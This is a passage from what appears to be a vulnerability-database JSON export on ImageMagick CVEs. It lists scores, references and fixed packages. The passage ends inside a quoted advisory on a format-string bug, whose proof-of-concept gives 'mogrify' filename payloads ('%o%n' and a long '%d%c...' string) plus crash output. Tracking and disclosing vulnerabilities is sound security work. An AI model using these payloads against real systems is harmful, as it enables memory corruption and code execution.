"scoring_elements": "0.24131", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24244", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24065", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24096", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24108", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00089", "scoring_system": "epss", "scoring_elements": "0.2526", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57803" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-57803", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-57803" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-24T03:55:19Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-24T03:55:19Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-24T03:55:19Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57803", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57803" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1112469", "reference_id": "1112469", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1112469" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391093", "reference_id": "2391093", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391093" }, { "reference_url": "https://github.com/advisories/GHSA-mxvv-97wh-cfmm", "reference_id": "GHSA-mxvv-97wh-cfmm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mxvv-97wh-cfmm" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:16313", "reference_id": "RHSA-2025:16313", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:16313" }, { "reference_url": "https://usn.ubuntu.com/7812-1/", "reference_id": "USN-7812-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7812-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/418443?format=api", "purl": "pkg:apk/alpine/imagemagick@7.1.2.8-r0?arch=aarch64&distroversion=v3.23&reponame=community", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/imagemagick@7.1.2.8-r0%3Farch=aarch64&distroversion=v3.23&reponame=community" } ], "aliases": [ "CVE-2025-57803", "GHSA-mxvv-97wh-cfmm" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f6pf-5jnz-fkd1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21990?format=api", "vulnerability_id": "VCID-jtkv-nvan-jbag", "summary": "ImageMagick has Integer Overflow in BMP Decoder (ReadBMP)\nCVE-2025-57803 claims to be patched in ImageMagick 7.1.2-2, but **the fix is incomplete and ineffective**. The latest version **7.1.2-5 remains vulnerable** to the same integer overflow attack.\n\nThe patch added `BMPOverflowCheck()` but placed it **after** the overflow occurs, making it useless. A malicious 58-byte BMP file can trigger AddressSanitizer crashes and DoS.\n\n**Affected Versions:**\n- ImageMagick < 7.1.2-2 (originally reported)\n- **ImageMagick 7.1.2-2 through 7.1.2-5 (incomplete patch)**\n\n**Platform and Configuration Requirements:**\n- 32-bit systems ONLY (i386, i686, armv7l, etc.)\n- Requires `size_t = 4 bytes`. (64-bit systems are **NOT vulnerable** (size_t = 8 bytes))\n- Requires modified resource limits: The default `width`, `height`, and `area` limits must have been manually increased (Systems using default ImageMagick resource limits are **NOT vulnerable**).\n\n---", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62171.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62171.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-62171", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22454", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22458", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22442", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22496", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22537", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22519", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22464", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22383", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22595", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00074", "scoring_system": "epss", "scoring_elements": "0.22552", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22694", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-62171" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62171", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62171" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.9.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.9.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/cea1693e2ded51b4cc91c70c54096cbed1691c00", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-17T17:05:36Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/cea1693e2ded51b4cc91c70c54096cbed1691c00" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00019.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00019.html" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1118340", "reference_id": "1118340", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1118340" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2404735", "reference_id": "2404735", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2404735" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62171", "reference_id": "CVE-2025-62171", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62171" }, { "reference_url": "https://github.com/advisories/GHSA-9pp9-cfwx-54rm", "reference_id": "GHSA-9pp9-cfwx-54rm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9pp9-cfwx-54rm" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9pp9-cfwx-54rm", "reference_id": "GHSA-9pp9-cfwx-54rm", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-17T17:05:36Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9pp9-cfwx-54rm" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3058", "reference_id": "RHSA-2026:3058", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3058" }, { "reference_url": "https://usn.ubuntu.com/7876-1/", "reference_id": "USN-7876-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7876-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/418443?format=api", "purl": "pkg:apk/alpine/imagemagick@7.1.2.8-r0?arch=aarch64&distroversion=v3.23&reponame=community", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/imagemagick@7.1.2.8-r0%3Farch=aarch64&distroversion=v3.23&reponame=community" } ], "aliases": [ "CVE-2025-62171", "GHSA-9pp9-cfwx-54rm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jtkv-nvan-jbag" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/27754?format=api", "vulnerability_id": "VCID-r889-wzc7-1yem", "summary": "ImageMagick has a Format String Bug in InterpretImageFilename leads to arbitrary code execution\n## Summary\nA format string bug vulnerability exists in `InterpretImageFilename` function where user input is directly passed to `FormatLocaleString` without proper sanitization. An attacker can overwrite arbitrary memory regions, enabling a wide range of attacks from heap overflow to remote code execution.\n<br>\n\n## Details\n### root cause\n```\nMagickExport size_t InterpretImageFilename(const ImageInfo *image_info,\n Image *image,const char *format,int value,char *filename,\n ExceptionInfo *exception)\n{\n\n...\n\n while ((cursor=strchr(cursor,'%')) != (const char *) NULL)\n {\n const char\n *q = cursor;\n\n ssize_t\n offset = (ssize_t) (cursor-format);\n\n cursor++; /* move past '%' */\n if (*cursor == '%')\n {\n /*\n Escaped %%.\n */\n cursor++;\n continue;\n }\n /*\n Skip padding digits like %03d.\n */\n if (isdigit((int) ((unsigned char) *cursor)) != 0)\n (void) strtol(cursor,(char **) &cursor,10);\n switch (*cursor)\n {\n case 'd':\n case 'o':\n case 'x':\n {\n ssize_t\n count;\n\n count=FormatLocaleString(pattern,sizeof(pattern),q,value);\n if ((count <= 0) || (count >= MagickPathExtent) ||\n ((offset+count) >= MagickPathExtent))\n return(0);\n (void) CopyMagickString(p+offset,pattern,(size_t) (MagickPathExtent-\n offset));\n cursor++;\n break;\n }\n```\nWhen the InterpretImageFilename function processes a filename beginning with format specifiers such as %d, %o, or %x, the filename string is directly passed as a parameter to the FormatLocaleString function.\n<br>\n```\nMagickExport ssize_t FormatLocaleString(char *magick_restrict string,\n const size_t length,const char *magick_restrict format,...)\n{\n ssize_t\n n;\n\n va_list\n operands;\n\n va_start(operands,format);\n n=FormatLocaleStringList(string,length,format,operands);\n va_end(operands);\n return(n);\n}\n```\n```\nMagickPrivate ssize_t FormatLocaleStringList(char *magick_restrict string,\n const size_t length,const char *magick_restrict format,va_list operands)\n{\n...\nn=(ssize_t) _vsnprintf_l(string,length,format,locale,operands);\n```\nInside FormatLocaleString, the variable argument list is initialized through va_start, after which the format string processing occurs by interpreting the format specifiers and using corresponding values from CPU registers and the call stack as arguments for the formatting operations.\n<br>\n## PoC\n### 1. Heap overflow read tested on development container\n```\nroot@9184bf32bd0f:/workspaces/ImageMagick# mogrify %o%n\n=================================================================\n==55653==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000001 at pc 0x5bdccaae689e bp 0x7fff6882c410 sp 0x7fff6882c408\nREAD of size 8 at 0x603000000001 thread T0\n #0 0x5bdccaae689d in SplaySplayTree splay-tree.c\n #1 0x5bdccaae865e in GetValueFromSplayTree (/ImageMagick/bin/magick+0x59165e) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #2 0x5bdccaa8e47b in GetImageOption (/ImageMagick/bin/magick+0x53747b) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #3 0x5bdccaa63c39 in SyncImageSettings (/ImageMagick/bin/magick+0x50cc39) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #4 0x5bdccaa63036 in AcquireImage (/ImageMagick/bin/magick+0x50c036) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #5 0x5bdccaa70cc4 in SetImageInfo (/ImageMagick/bin/magick+0x519cc4) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #6 0x5bdccae42e13 in ReadImages (/ImageMagick/bin/magick+0x8ebe13) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #7 0x5bdccb11ee08 in MogrifyImageCommand (/ImageMagick/bin/magick+0xbc7e08) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #8 0x5bdccb103ca9 in MagickCommandGenesis (/ImageMagick/bin/magick+0xbacca9) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #9 0x5bdccaa5f939 in main (/ImageMagick/bin/magick+0x508939) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #10 0x73b2102b2d8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: d5197096f709801829b118af1b7cf6631efa2dcd)\n #11 0x73b2102b2e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: d5197096f709801829b118af1b7cf6631efa2dcd)\n #12 0x5bdcca99f404 in _start (/ImageMagick/bin/magick+0x448404) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n\n0x603000000001 is located 15 bytes to the left of 24-byte region [0x603000000010,0x603000000028)\nallocated by thread T0 here:\n #0 0x5bdccaa2224e in malloc (/ImageMagick/bin/magick+0x4cb24e) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #1 0x73b21031915a (/lib/x86_64-linux-gnu/libc.so.6+0x9015a) (BuildId: d5197096f709801829b118af1b7cf6631efa2dcd)\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow splay-tree.c in SplaySplayTree\nShadow bytes around the buggy address:\n 0x0c067fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n=>0x0c067fff8000:[fa]fa 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00\n 0x0c067fff8010: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa\n 0x0c067fff8020: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00\n 0x0c067fff8030: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00\n 0x0c067fff8040: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa\n 0x0c067fff8050: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n==55653==ABORTING\n```\nProcessing a malicious filename containing format string specifiers such as %d%n results in corruption of the SplayTree structure stored in the r8 register. The corrupted structure contains invalid pointer values that are later dereferenced by the SplaySplayTree function, causing the function to access unintended memory locations and triggering a heap overflow condition.\n<br>\n\n### 2. Shell execution tested on a local environment\n\nhttps://github.com/user-attachments/assets/00e6a091-8e77-48f0-959e-c05eff69ff94\n\n```\n ~/fuzz gdb -nx -args ./patchedsecure/bin/mogrify %d%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%